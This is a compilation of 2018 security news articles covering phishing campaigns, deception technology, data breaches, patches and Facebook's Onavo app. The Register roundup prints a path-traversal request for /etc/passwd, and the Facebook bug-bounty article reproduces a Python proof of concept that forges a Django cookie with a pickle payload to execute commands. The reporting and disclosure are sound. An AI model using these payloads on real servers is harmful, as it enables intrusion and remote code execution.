STE WILLIAMS

Iranian Hackers Target Universities in Global Cyberattack Campaign

Cobalt Dickens threat group is suspected to be behind a large-scale cyberattack wave targeting credentials to access academic resources.

The school year has barely begun and things are off to a rocky start for some colleges: Cobalt Dickens, a threat group linked to the Iranian government, has been spotted targeting universities worldwide in a large-scale credential theft campaign.

Researchers in Secureworks’ Counter Threat Unit (CTU) uncovered the cyberattacks after initially spotting an URL spoofing a university login page. Further analysis on the IP address hosting the page revealed a massive attack involving 16 domains with more than 300 spoofed websites and login pages for 76 universities across 14 countries.

Attackers targeted schools in the United States, United Kingdom, Australia, Canada, China, Israel, Japan, and Turkey, among others. The largest concentration of affected universities was in the US. Researchers did not disclose which were targeted but are working to alert them, they report.

Victims who entered their credentials on a fake login page were redirected to the school’s legitimate website, where they were either logged into a valid browsing session or prompted to enter their username and password a second time. Several domains referred to the target institution’s online library systems, a sign of attackers trying to access academic resources.

Most domains in this campaign were tied to the same IP address and DNS name server. One domain, registered in May 2018, contained subdomains designed to spoof university targets and redirect visitors to fake login pages on other domains controlled by the attackers.

Many of the spoofed domains were registered between May and August 2018; the most recent was created on August 19. It seems threat actors were still building infrastructure to support the campaign at the time Secureworks’ CTU found it, researchers report in a blog post.

This campaign shared infrastructure with earlier Cobalt Dickens attacks on academic resources, a popular target for the threat group. In a previous campaign, its actors created lookalike domains to phish targets and used stolen credentials to steal intellectual property (IP).

“Cobalt Dickens’ motivation is to obtain access to subscriber-only academic resources as well as mailboxes of university staff and students,” says Rafe Pilling, information security researcher with the Secureworks CTU, of the August campaign. “Revenue generation is likely a key motivator, but the resulting access could be used for other campaigns like onward phishing and intrusion against targets that might implicitly trust contacts linked to educational institutions.” However, he notes, there has so far been no observation of this type of activity.

There are several reasons why universities are hot targets for attackers seeking IP. For starters, they’re harder to secure than financial companies, healthcare organizations, and other institutions in more regulated industries. They also attract some of the world’s most intelligent researchers and students, making them treasure troves of new ideas and information.

Post-Indictments

Earlier this year, the US Department of Justice indicted the Mabna Institute and nine Iranians for their involvement with Cobalt Dickens activity conducted between 2013 and 2017.

Many threat groups stick with their tactics despite disclosures like these, and CTU says the August activity could be a sign the group is continuing its campaigns despite its members’ indictments.

“This activity aligns with Cobalt Dickens’ previous MO,” says Pilling of the May-August campaign. “Based on our investigation, they haven’t seemed to have modified their tactics significantly when compared to the campaign they’ve been running over the past few years.”

“If it ain’t broke … ‘ as the saying goes,” he adds.

Pilling anticipates the activity will continue as the indictments by the DoJ don’t appear to have been a strong deterrent. The basic rules of security hygiene apply: phishing awareness is key to defending against this type of activity, he says, and users should be educated on what to look for and to avoid entering their credentials in a site linked within an email.

“Any email that wants you to click a link and enter credentials should be considered suspect,” he says.

Related Content:

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial … View Full Bio

Article source: https://www.darkreading.com/endpoint/iranian-hackers-target-universities-in-global-cyberattack-campaign/d/d-id/1332676?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

The Difference Between Sandboxing, Honeypots & Security Deception

A deep dive into the unique requirements and ideal use cases of three important prevention and analysis technologies.

Networks, cyberattacks, and the strategies used to stop them are continuously evolving. Security deception is an emerging cyber-defense tactic that allows researchers and information security professionals to observe the behavior of attackers once they’ve gained access to what they think is a business network.

The term “security deception” only came into wide usage in the last year, so it can be difficult to tell how exactly these solutions are different from other tools that try to trick attackers, such as sandboxing and honeypots. Like these other tactics, security deception fools attackers and malicious applications into revealing themselves so that researchers can devise effective defenses against them, but it relies more on automation and scale, and requires less expertise to set up and manage. Each of these technologies has unique requirements and ideal use cases. To understand what those are, we’ll need to look at each of them in more detail.

Sandboxing
The need for the analysis of network traffic and programs has existed almost since the dawn of networks and third-party programs. Sandboxing, introduced in the 1970s for testing artificial intelligence applications, allows malware to install and run in an enclosed environment, where researchers can monitor their actions to identify potential risks and countermeasures. Today, effective sandboxing is most often performed on dedicated virtual machines on a virtual host. This allows for malware to be safely tested against multiple different OS versions on machines that are segregated from the network. Security researchers use sandboxing when analyzing malware and many advanced anti-malware products use it to determine whether or not suspicious files are truly malicious based on their behavior. These kinds of anti-malware solutions are becoming more important because so much of modern malware is obfuscated to avoid signature-based antivirus.

Most businesses aren’t capable of performing malware analysis with same level of sophistication and expertise as a dedicated researcher or vendor. Smaller businesses typically benefit the most from deploying sandboxing as service from a provider that already has implementations in place that can automate the whole process.

Honeypots
Honeypots and honeynets are deliberately vulnerable systems meant to draw the attention of attackers. Honeypots are single hosts that entice attackers to attempt to steal valuable data or further scope out the target network. The idea behind honey nets, which began to circulate in 1999, is to understand the process and strategy of attackers. Honeynets are made up of multiple honeypots, often configured to emulate an actual network — complete with a file server, a web server, etc. — so that attackers believe they’ve successfully infiltrated a network. Instead, they’re actually in an isolated environment, under a microscope.

Honeypots let researchers watch how real threat actors behave, while sandboxing reveals only how malware behaves. Security researchers and analysts commonly use honeypots and honeynets for this exact purpose. Researchers as well as IT and security pros concerned with defense can use this information to improve their organization’s security by noting new attack methods and implementing new defenses to match. Honeynets will also waste attackers’ time and can get them to give up the attack in frustration. This is most useful for government organizations and financial institutions that are targeted by hackers often, but any business of medium size or larger will benefit from a honeynet. Small and medium-sized businesses (SMBs) may benefit as well, depending on their business model and security situation, but most SMBs today don’t have a security expert capable of setting up or maintaining a honeypot.

Cyber Deception
The core idea of cyber deception was first discussed in 1989 by Gene Spafford of Purdue University. Some argue that it more or less refers to modern, dynamic honeypots and honeynets and, fundamentally, they are correct. Security deception is a new term and so the definition hasn’t yet been set in stone, but in general it refers to a range of more-advanced honeypot and honeynet products that offer more automation for both detection and the implementation of defenses based on the data they gather.

It’s important to note that there are different levels to deception technologies. Some are little more than a honeypot, while others mimic full-blown networks that include real data and devices. Benefits include the ability to spoof and analyze different types of traffic, provide fake access to accounts and files, and the ability to more closely imitate an internal network. Some security deception products can be deployed automatically, keep attackers busy in loops of access for more information, and give users more detailed and realistic responses to attackers. When a security deception product works as intended, hackers will truly believe they’ve infiltrated a restricted network and are gathering critical data. It’s true, they’ll be accessing data, but it will only be information you intend for them to see.

Security deception is still in its infancy, so as with most new security technologies, its initial use case is as a niche tool for large enterprises that will gradually move down market. At present, these tools are particularly relevant for high-profile targets such as government facilities, financial institutions, and research firms. Organizations still need a security analyst to parse the data from security deception tools, so smaller companies without specialized security staff typically wouldn’t be able to tap into the benefits. That said, SMBs can benefit from contracting with security vendors that offer analysis and protection as a service.

All these security technologies have their role in the prevention and analysis landscape. At a high level, sandboxing involves installing and allowing malware to run for behavioral observation, while honeypots and nets focus on the analysis of threat actors conducting reconnaissance on an infiltrated network, and security deception is the more recent conception of advanced intrusion detection and prevention. Deception technologies offer more realistic honeynets that are easier to deploy and provide more information to users, but they come with higher budgetary and expertise requirements that typically restrict their use to large enterprises … at least for the moment.

Related Content:

Marc Laliberte is an information security threat analyst at WatchGuard Technologies. Specializing in network security technologies, Marc’s industry experience allows him to conduct meaningful information security research and educate audiences on the latest cybersecurity … View Full Bio

Article source: https://www.darkreading.com/endpoint/the-difference-between-sandboxing-honeypots-and-security-deception/a/d-id/1332663?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

How Can We Improve the Conversation Among Blue Teams?

Dark Reading seeks new ways to bring defenders together to share information and best practices

IT security pros, particularly those who work on blue teams doing everyday data defense, seldom have a chance to get together and share ideas on how to do their work better. How do you share best practices with colleagues in other organizations?

In 2017, Dark Reading launched a conference called INsecurity in Washington, D.C. to try to foster this conversation. The event raised some fascinating interaction, but it was a struggle to get security pros to attend. This year, we put together another strong program of speakers and discussions that was scheduled to be held in Chicago, but we failed to achieve critical mass in registrations and last week, were forced to cancel the conference.

This raises the question: How do security pros get together and share ideas to improve their defenses? What methods do you use to share information, and how do you speak to colleagues in other organizations about best practices?

The bad guys are doing it. The IRC community and the Dark Web are filled with opportunities for online attackers to share ideas, buy and sell exploits, and explore opportunities to work together.

Security researchers are good at sharing information, too. Each year, numerous conferences – led by Black Hat’s events in the United States, Europe, and Asia – enable ethical hackers and red teamers to speak on the vulnerabilities they’ve found, the methods they used, and the methods for remediating the flaws.

For those who work on the blue team, however, the opportunities to share ideas with those in other organizations are less frequent – and often, less useful. While there are many cybersecurity events each year, most are limited to simple PowerPoint presentations by experts. There is little interaction among attendees, and even less conversation between organizations after the security pros return home to their own data centers.

If you’re lucky enough to work in an industry with a strong ISAC, you might find opportunities to share threat information and best practices there. And many of the security professional associations, including (ISC)2, ISSA, and ISACA, hold both national and regional conferences. InfraGard offers some opportunities to share ideas with government and law enforcement agencies.

As an industry, however, are we really doing enough to share problems and best practices – or are we keeping them mostly to ourselves, and reinventing the wheel separately, in our own silos? Have we become so afraid of leaking information that we don’t talk across enterprise boundaries at all?

It seems unlikely that the information security problem can be solved until we find meaningful ways of sharing knowledge and information about threats, security challenges, and how to address them. Ben Franklin said it best: If we don’t hang together, we will hang separately.

At Dark Reading, we are committed to finding ways to enable these conversations among data defenders. Aside from the news and commentary you see on these pages, we regularly conduct original research, webinars, virtual events, and live sessions and events at conferences such as Black Hat and Interop ITX.

But we want to do more, and we want to help you to find ways to interact in a useful way with colleagues in other organizations. So we put it to you: How do you share information and best practices with others in our industry? What works? What doesn’t? If you have thoughts, please add a comment to this column, or send us an email ([email protected]). We want to know how you’re communicating with colleagues today – and how you think the industry can communicate better in the future.

Related Content:

Tim Wilson is Editor in Chief and co-founder of Dark Reading.com, UBM Tech’s online community for information security professionals. He is responsible for managing the site, assigning and editing content, and writing breaking news stories. Wilson has been recognized as one … View Full Bio

Article source: https://www.darkreading.com/how-can-we-improve-the-conversation-among-blue-teams/a/d-id/1332668?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Proof-of-Concept Released for Apache Struts Vulnerability

Python script for easier exploitation of the flaw is now available as well on Github.

That didn’t take long: Last week, the Apache Foundation reported that a new serious vulnerability had been found in Struts. This week, proof-of-concept code for the flaw, including a Python script for easier code deployment, was found available on Github.

Unlike vulnerabilities that led to breaches like that at Equifax, this Struts vulnerability is the result of a specific configuration rather than a set of add-ins. While no exploit code had been found “in the wild” at the time of the original notice, the proof-of-concept code placed on Github is likely to shorten the interval until real exploitation is attempted by an attacker.

Meanwhile, Python code that probes for the vulnerabilities has been published to Github as well. A cursory examination of the Python script shows it is simple to check for the vulnerable configuration; the actual work is done in less than 20 lines of code.

Allan Liska, senior security architect at Recorded Future, says that exploiting the vulnerability now means that “a simple, well-crafted URL is enough to give an attacker access to a victim’s Apache Struts installation. There is already exploit code on Github, and underground forums are talking about how to exploit it.”

He warns that many large organizations may be unaware they are at risk, “because Struts underpins a number of different systems, including Oracle and Palo Alto.”

All Apache Struts users have been urged to update to versions 2.3.35 or 2.5.17 as rapidly as possible to avoid exposure to a remote code execution attack exploiting the vulnerability.

Related Content:

Curtis Franklin Jr. is Senior Editor at Dark Reading. In this role he focuses on product and technology coverage for the publication. In addition he works on audio and video programming for Dark Reading and contributes to activities at Interop ITX, Black Hat, INsecurity, and … View Full Bio

Article source: https://www.darkreading.com/application-security/proof-of-concept-released-for-apache-struts-vulnerability/d/d-id/1332673?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Voting machine maker vows to step up security, Fortnite bribes players to do 2FA – and more

Roundup Summer rolls on, Reg vultures are making the most of their hols before the September rush hits, and in the past week, we saw Lazarus malware targeting Macs, Adobe scrambling to get an emergency patch out, and Democrats losing their minds over a simple training exercise.

Here’s what else went down…

SOLEO mission

Researchers at Project Insecurity have detailed a vulnerability in SOLEO’s IP relay technology that disclosed sensitive files on affected installations. For example, the following HTTPS request to a vulnerable service…

/IPRelayApp/servlet/IPRelay?page=../../../../../../../etc/passwd?

…would potentially return the hashed password file for the system. The bug was fixed by SOLEO on August 10, and pushed out to ISPs and other communications providers using the technology. We’re told by Project Insecurity that “essentially every internet service provider in Canada uses Soleo’s IP Relay service,” which means – it is claimed – tens of millions of Canadians were at risk until it was patched.

Slapped in the face with a Triout

Security researchers have unearthed a toolkit, dubbed Triout, for building extensive spying capabilities into seemingly benign Android applications.

A seemingly innocuous app was found repackaged using Triout to hide the presence of malicious code on a device, record phone calls as a media file, log incoming text messages, record videos, copy all photos taken by the front and rear cameras, and collect GPS coordinates. Harvested information was transmitted back to a miscreant-controlled command-and-control server.

Researchers at Bitdefender this month identified and described in detail the Triout code.

Blast from the past

This is not strictly security related, other than involving an operating system wasn’t considered particularly secure: Windows 95 has showed up as an Electron app for Linux, macOS, and Windows. It uses the x86 virtualization JavaScript tech dubbed v86 to run the OS. You can also, by the way, boot Windows 2000 in a browser window, using JavaScript, as well as Linux and FreeDOS, thanks to Qemu supremo Fabrice Bellard.

ESS ticks ballot for better security

A voting machine maker previously called out for its weak security is kicking off a campaign to harden its products from hackers.

ESS announced it was expanding its work with the US government’s Homeland Security and the Information Sharing and Analysis Centers (ISAC) to improve its security protections. The effort includes the installation of advanced threat monitoring and network security monitoring for ESS products and services as well as membership in a threat-sharing network that will allow the company to both send and receive alerts on new attacks.

One could ask why the manufacturer waited this long to improve the security protections in its stuff, but hey… better late than never. Also, it came a day after it was leaned on by US politicians, so there’s that.

Uncle Sam puts out a call for supply-chain security

Speaking of Homeland Security, the agency is looking to bring in outside vendors who have fresh ideas on securing IoT devices and supply chains.

Nextgov spotted a request from the department for proposals from IT suppliers who can help it make sure that foreign governments aren’t tampering with the individual components that get sold to organizations who, in turn, sell to government agencies.

As the report notes, this comes as the government has slapped bans on Chinese electronics vendors over fears that those companies were working a bit too closely with the government of their home country.

More industrial controllers left wide open to attacks

A team of researchers with Positive Technologies have disclosed a set of four exploitable security flaws in programmable logic controllers (PLCs) made by Schneider Electronics and sold to heavy industries such as power plants, water departments, and oil refineries.

The four vulnerabilities would allow for things like authentication bypass, arbitrary code execution from web servers, and denial of service attacks. The flaws were disclosed in March, but are only now being detailed by Positive.

According to the researchers, the flaws would not be particularly difficult for an attacker to exploit, and could be used as a gateway to larger attacks, or just to cause general chaos at the targeted facility.

There is one saving grace here: the industrial controllers in question are all in the range of 20 years old. It’s not unheard of for embedded tech to stay in the field that long, but any device containing these bugs could probably do with a replacement, or at least a good update that includes new security protections.

Fortnite bribes kids to turn on 2FA

Runaway hit build’n’shoot game Fortnite has found a novel way to get players to make their accounts more secure. Developer Epic Games says that players who turn on two-factor authentication for their accounts will get access to a new dance move.

Adding the option for a verification code on your account now lets players perform an emote called “boogiedown” that, as its name implies, involves… erm… boogying down.

El Reg ran this by one of our Fortnite playing Vultures and, apparently, yes, an in-game dance move is something that the yoofs these days value enough to go through the hassle of two-factor login. Good work, Epic.

Speaking of Fortnite, Googlers have discovered that the game’s Android app – which famously sidestepped Google’s official Play Store – can be hijacked by malicious software on a device to install further dodgy code.

Darkness Falls on darknet drug-pushers

The FBI says it has nabbed a suspected dealer as part of a dark-web market takedown.

This time, it’s a Cleveland-based person they say was the largest online fentanyl dealer in the US, and the fourth-largest in the world. The alleged dealer, going by the handle MH4Life, was actually couple Matthew and Holley Roberts, both 35, it is claimed.

The pair were charged with using accounts on Silk Road, Dream Market, Aplhabay, and others to deal drugs from 2011 to 2018. The arrest was the headline of the FBI’s Operation Darkness Falls, a drug takedown focusing on dark net dealers.

OpenSSH clears up ‘enumeration’ bug

The OpenSSH project has patched a vulnerability that could potentially allow an attacker to, without any authentication, work out the usernames of user accounts on a server.

The flaw, designated CVE-2018-15473, is an information-disclosure bug stemming from the way OpenSSH servers handle failures during login attempts. If you break a connection between a client and a server in a particular way while attempting a login, the response from the server differs depending on whether you were attempting to login as a user that exists in the system, or an unknown username. Thus, an attacker could in theory work their way through all the possible usernames on a system, keeping a note of the ones that exist. This information can be leveraged to pull off other attacks, social engineering tricks, and so on.

It’s not exactly a critical bug, and OpenSSH decided to quietly patch it without making a big deal out of the whole thing.

“We have and will continue to fix bugs like this when we are made aware of them and when the costs of doing so aren’t too high,” explained developer Damien Miller, “but we aren’t going to get excited about them enough to apply for CVEs or do security releases to fix them.”

And finally…

Sales terminals in some Cheddar’s Scratch Kitchen restaurants may well have been hacked in 23 US states to steal payment card information between November 3, 2017, and January 2, 2018. A technique to steal crypto-keys from electromagnetic radiation from a very nearby device has been detailed here. The described attack targeted OpenSSL, which was patched in May to thwart the snooping. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/27/security_roundup/

We can rebuild him, we have the technology: AI will help security teams smack pesky anomalies

Analysis With highly targeted cyber attacks the new normal, companies are finding the once-hidden Security Operations Centre (SOC) is the part of their setup they really count on.

SOCs have existed in a variety of guises for decades, emerging in recent years as a natural consequence of centralising security monitoring across organisations that have become increasingly geographically and technologically complex.

It made sense to put expertise in one place, or virtualize them across regions, to respond to the growth in security threats. Although hugely successful, their use of conventional tools and products in a world where known security threats are giving way to novel and unknown patterns is proving a challenge.

Although many successful security compromises are built from a toolkit of relatively simple techniques and common weaknesses, the chances of new attack patterns combining these with an unknown vulnerability have risen dramatically.

It’s difficult to estimate the scale of this phenomenon, but an unknown threat might be anything from an unexpected insider attack to one that abuses internal credentials or exploits one or more zero-day software flaws – recent examples from a SOC perspective would include the WannaCry and NotPetya attacks of 2017 that affected thousands of organisations across numerous sectors.

Faced with the likelihood of compromise, breached SOCs’ effectiveness was measured in terms of response, mitigation, and clean-up. Reacting in minutes or even seconds made the difference, as did the quality of security response plans. Detection was no longer the only game; SOCs needed to respond quickly or find themselves coping with a mess in the long run.

Now for AI

Faced with this growing reality, it’s not surprising that technologies flying under the AI banner have arrived like a saviour on the back of promises that are not always well-understood or explained.

The traditional SOC makes use of and depends upon layers of security sensors and systems, all of which generate information, often in the form of logs and events. For years, the answer to processing this was to channel as much as possible into repositories such as those used by Security Information and Event Management (SIEM). As the volume of event and log data grows, the complexity of analysis and decision making has increased, in turn leading to challenges in threat detection and response times.

But response times are now everything as organisations must accept they will be targeted and breached. This leaves them sitting uneasily between over-reactive detection, which generates too many false positives, and under-active detection, which leads to false negatives. It hasn’t helped, of course, that the people needed to detect, triage, respond to and, where necessary, escalate threat events, require an expanding suite of skills that are in perennially short supply.

AI – more specifically machine learning and big data analytics – has felt like a way out of this morass because it promises to do things that humans using SIEM have found difficult, namely correlate and spot anomalies quickly and in an automated way. The problem is that AI isn’t a standardised technology so much as a set of concepts and algorithms, which makes it hard to distinguish what’s hype and what’s not.

“If I were to reinvent it I’d call it ‘augmented intelligence’,” suggests Ian Glover, president of global ethical pen-testing body CREST, who worries that a useful concept is in danger of being misunderstood.

“What’s actually happening in relation to SOCs, is big data combined with AI to help with analytics,” he says.

In addition to response, AI’s other important benefit is the ability to learn more quickly – or at all – which goes back to the issue of unknown threats. Attacks evolve employing different MOs as they look for and exploit weaknesses, but their development is always gradual. If AI analytics can be used to understand the deeper patterns of these small changes, the defenders have discovered a way of evolving with them.

Anomaly response

At its heart, SOC security rests on identifying the anomaly – data that stands out as being unusual or unexpected. Everything – tools, processes, the human response – is predicated on this. The limitation is that anomalies not only vary from network to network, device to device and system to system, but they are also inevitable. Most unusual behaviour by individual users, or the application of protocol traffic they generate, turns out to be completely innocent. Conversely, ordinary traffic can also hide anomalous traffic as is the case where attackers abuse stolen privileged credentials. Conventional perimeter security finds this sort of compromise very hard to spot because it appears completely legitimate.

Using AI effectively in the SOC depends upon identifying anomalies in a sophisticated way using baselining. In theory, doing this requires the baselining of multiple data points and not simply one user or resource. The power of AI is that there is no theoretical limit to the number of data points that can be used to define a baseline and what is deviating from it.

What AI brings is the ability to learn, that is to constantly adjust these parameters over time. “AI is going to be used to work out whether those anomalies are things we should be concerned about. But if all of a sudden we’re seeing anomalies and they’re all OK, then the AI system should feed back into the analytics system to say that this is an expected behaviour,” says Glover.

What none of this can replace is the role of the human decision makers, which in SOCs comprise layers of skills from detection, response, and mitigation right up to skilled forensics. AI can alert any one of these layers to the problem, but it is not yet capable of telling them what to do about it.

AI does not mean some magical transformation in which machines take over the job of defending networks from other, malevolent machines. It’s a tool in which humans are always the decision makers, using the analytics provided by machine intelligence to make better and quicker decisions.

“AI on its own is not the answer,” says Glover. “We should be using learning systems to feed back into the inference engines and analytics.” Conceptually, “data analytics and the AI allow analysis of data to be conducted faster. The final triage of invoking a cyber-response plan would go through the SOC managers.”

New-world SOCs

None of this really explains how AI can get to grips with the data problem that SIEM has struggled with – namely that simply adding more sensors and security layers risks creating more alerts that, in turn, confronts SOCs with a greater number of situations to evaluate and possibly act on. How does a security manager in this world determine which alerts are worth following and which are phantoms unless they have some kind of reference point?

This is where User Behaviour Analytics (UBA) and, more recently, User and Entity Behavior Analytics (UEBA) have staked their claim. In UEBA, what matters first is not simply the idea of a baseline – a version of the “normal” from which an anomaly can be discerned – but that this is based on behaviour associated with network users and accounts.

Again, not a brand-new idea – user monitoring has been around for years – but for SOCs its power is enhanced by harnessing it to possibilities offered by machine learning. Unlike rule-based systems, UEBA baselining with machine learning can adjust its worldview of a user’s behaviour, understanding this in greater depth, as the user’s behaviour changes over time. It’s a principle that can be extended to applications and devices if need be.

This should be the perfect job for machine learning: in this scenario, security analytics simply becomes the appliance of algorithms to what is just another big-data challenge. And machine learning, after all, grows on big data. But while the concept is sound, it’s early days for such systems and the proof of their effectiveness will be in the security they deliver in tackling real-world incidents.

The SOC defenders have time to perfect UEBA, but – perhaps, given the changing times and escalating threats – not as much as some of them would like. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/24/the_rise_of_neural_ai_and_what_it_means_for_security_teams/

Hackers clock personal deets on ‘two million’ T-Mobile US subscribers

T-Mobile US systems were hacked this week, the cellular giant confirmed in a brief note on its website this week.

The break-in was spotted on August 20 by the firm’s cyber-security team, it said, and the miscreants booted out same day.

“Out of an abundance of caution, we wanted to let you know about an incident that we recently handled that may have impacted some of your personal information,” T-Mobile US warned.

According to Vice magazine’s tech news offshoot Motherboard, the invading miscreants were able to potentially access information on about two million customers – 3 per cent of T-Mobile US’s subscribers.

The US telco said none of the customers’ financial data nor social security numbers were lifted, and no plaintext passwords were leaked – although we gather that hashed passwords were exposed to the hackers.

“You should know that some of your personal information may have been exposed, which may have included one or more of the following: name, billing zip code, phone number, email address, account number and account type (prepaid or postpaid),” the carrier told its subscribers.

T-Mo added that it had reported the cyber-intrusion to the “authorities”, without specifying who those authorities were. The security breach was caused when “an international group” of hackers accessed a server through an API which was said not to have any “very sensitive data” available through it.

“As a reminder, it’s always a good idea to regularly change account passwords,” it chirpily added.

EE, which absorbed T-Mo’s UK operations, confirmed to El Reg that no Brits were affected. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/24/t_mobile_us_data_breach/

Well, can’t get hacked if your PC doesn’t work… McAfee yanks BSoDing Endpoint Security patch

McAfee has pulled a version of its Endpoint Security software after folks reported the antivirus software was crashing their Windows machines.

The security giant said it has taken down the August update for Endpoint Security 10.5.4, and is advising anyone who has downloaded it, but not installed, to hold off installing it.

“McAfee has removed ENS 10.5.4 August Update from the Product Downloads site,” customers were told. “For those customers that have already downloaded ENS 10.5.4 August Update, McAfee recommends to not install this update.”

According to McAfee’s advisory, the issue affects the latest versions of Endpoint Security, ENS Common Client, ENS Firewall, ENS Threat Prevention, and ENS Web Control. The software triggers blue-screen-of-death crashes on Windows 7 and 10 PCs, and Server editions of the Microsoft operating system, whether the OS is running on bare metal or in a virtual machine.

The decision to yank the update comes a week after McAfee began getting complaints from users who said the upgrade was causing both blue screen crashes and random restarts.

At least one Reg reader told us the issue is causing problems for their business. Our tipster, who asked to remain anonymous, noted that the issue, which McAfee traced back to a bad driver, seems to be worse on servers and systems with a lot of CPU cores and higher activity loads.

As of right now, the workarounds are limited to either not installing the bad update, or removing and reinstalling an older version of ENS 10.5.4. Unfortunately, McAfee doesn’t as yet have an ETA on when a fixed build will land.

“McAfee is investigating the issue and is working to provide a solution,” a spokesperson told El Reg. “We will communicate the latest information to our customers as soon as it becomes available.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/24/mcafee_blue_screen_of_death/

Now that’s a fortune cookie! Facebook splats $5k command-injection bug in one of its servers

Facebook has patched a remote-code execution flaw discovered in one of its servers.

Researcher Daniel ‘Blaklis’ Le Gall, of SCRT Information Security, said on Friday he bagged a $5,000 bug bounty from the social network for reporting a flaw that could be exploited to execute arbitrary commands using malicious cookies.

Though remote code execution bugs are considered serious problems, Le Gall noted that no Facebook user data was ever exposed or accessed via the uncovered hole. The bug was patched this month prior to today’s disclosure.

The programming blunder was spotted in a Facebook server running the Sentry log collection software.

“While I was looking at the application, some stacktraces regularly popped on the page, for an unknown reason,” Le Gall explained. “The application seemed to be unstable regarding the user password reset feature, which occasionally crashed.”

Looking through the logs, the researcher noted that he was able see where in the stack the cookie details were handled, as well as spot where the application was using Pickle, a Python data serialization protocol that can be vulnerable to manipulation.

With that information, Le Gall was able to craft cookies that would run commands on the machine. Here is the proof-of-concept exploit – a simple cookie that will tell the server to ping back a response with a 30-second delay:

#!/usr/bin/python
import django.core.signing, django.contrib.sessions.serializers
from django.http import HttpResponse
import cPickle
import os

SECRET_KEY='[RETRIEVEDKEY]'
#Initial cookie I had on sentry when trying to reset a password
cookie='gAJ9cQFYCgAAAHRlc3Rjb29raWVxAlgGAAAAd29ya2VkcQNzLg:1fjsBy:FdZ8oz3sQBnx2TPyncNt0LoyiAw'
newContent =  django.core.signing.loads(cookie,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')
class PickleRce(object):
    def __reduce__(self):
        return (os.system,("sleep 30",))
newContent['testcookie'] = PickleRce()

print django.core.signing.dumps(newContent,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies',compress=True)

Say what you will about Facebook, but the company’s handling of bug reports appears to be on point. Le Gall said that the the same day the flaw was reported, July 30, Facebook took down the server. Ten days later, a patch was in place and the server was brought back online.

The social network has made security a focal point in the aftermath of the Cambridge Analytica scandal, and in this case at least it appears to be paying off. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/24/facebook_remote_code_execution_bug/

Facebook pulls its privacy-violating Onavo VPN from Apple’s App Store

Apple last week suggested that Facebook remove its Onavo security app from the App Store due to privacy rule violations. On Wednesday, Facebook complied.

Onavo, an Israel-based company that Facebook acquired in 2013, has been raising eyebrows for months. Facebook had been pushing people to download the virtual private network (VPN) app for “protection” without mentioning that it was phoning home to Facebook to deliver users’ app usage habits… even when the VPN was turned off.

Back in March, after he saw media coverage of the app’s behavior and decided to see for himself what it was up to, Sudo Security Group CEO Will Strafach published his findings about the data collected by Onavo Protect for iOS.

Strafach said that he found that Onavo Protect “uses a Packet Tunnel Provider app extension, which should consistently run for as long as the VPN is connected” …in order to periodically send this data to Facebook as the user goes about their day:

  • When user’s mobile device screen is turned on and turned off.
  • Total daily Wi-Fi data usage in bytes (Even when VPN is turned off).
  • Total daily cellular data usage in bytes (Even when VPN is turned off).
  • Periodic beacon containing an “uptime” to indicate how long the VPN has been connected.

As the Wall Street Journal reported last year, Facebook had used that data to track its competition and scope out new product categories.

Onavo Protect has been free for download on Apple’s app store for years, sailing through Apple’s app review board with regularly approved updates. In addition to warning users about malicious sites, it allows them to create a VPN that redirects their internet traffic to one of Facebook’s servers: what it bills as a way to “keep you and your data safe.”

But that process enabled Facebook to collect and analyze users’ activity to find out how people use their phones beyond Facebook’s mobile app. Tech Crunch gave a few examples of how much this might benefit Facebook: the insights enable Facebook to get an early peek into apps that are becoming big hits; enables it to spot apps that are seeing slower user uptake; and gives it feedback on which new features are appealing to users.

The snooping came to light after Apple added a “Protect” button in Facebook’s iOS app that took users to Onavo Protect in the App store.

Somebody familiar with the Onavo situation told the Wall Street Journal that earlier this month Apple told Facebook that the app violated new rules, put forth in June, that limited data collection.

Those new guidelines stipulated that apps that get users’ permission to access contact lists and photos can’t then use the information to build databases or sell it to third parties. The new rules also said that apps need consent when “recording, logging or making a record of a user’s activity” and that advertisements inside apps must allow users to see all the information used to target them.

The person said that Apple told Facebook that Onavo violated a part of its developer agreement that prevents apps from using data in ways that go beyond what’s directly relevant to the app or to provide advertising.

Apple officials reportedly told Facebook last week that Onavo violated the company’s rules on data collection by developers. On Thursday, they suggested that Facebook voluntarily remove the app.

An Apple spokesperson told CNBC that the company’s latest guidelines make it clear that Onavo’s behavior was out of line:

We work hard to protect user privacy and data security throughout the Apple ecosystem. With the latest update to our guidelines, we made it explicitly clear that apps should not collect information about which other apps are installed on a user’s device for the purposes of analytics or advertising/marketing and must make it clear what user data will be collected and how it will be used.

In June, in hundreds of pages of written responses to questions from Congress, Facebook said that it’s not using Onavo data “for Facebook product uses” or to collect information about individuals. However, it did admit that it uses Onavo to gather information about apps’ popularity and what people do with them – information it uses to improve its own products, without tying it to individual users.

Facebook sent media outlets a statement in which it said that it’s always been upfront about Onavo with users: the Onavo privacy policy makes it clear that users are being tracked, it said.

We’ve always been clear when people download Onavo about the information that is collected and how it is used. As a developer on Apple’s platform we follow the rules they’ve put in place.

Nonetheless, when Apple suggested last week that Facebook yank the app, Facebook agreed, and down it came.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/6CUdleCX9tA/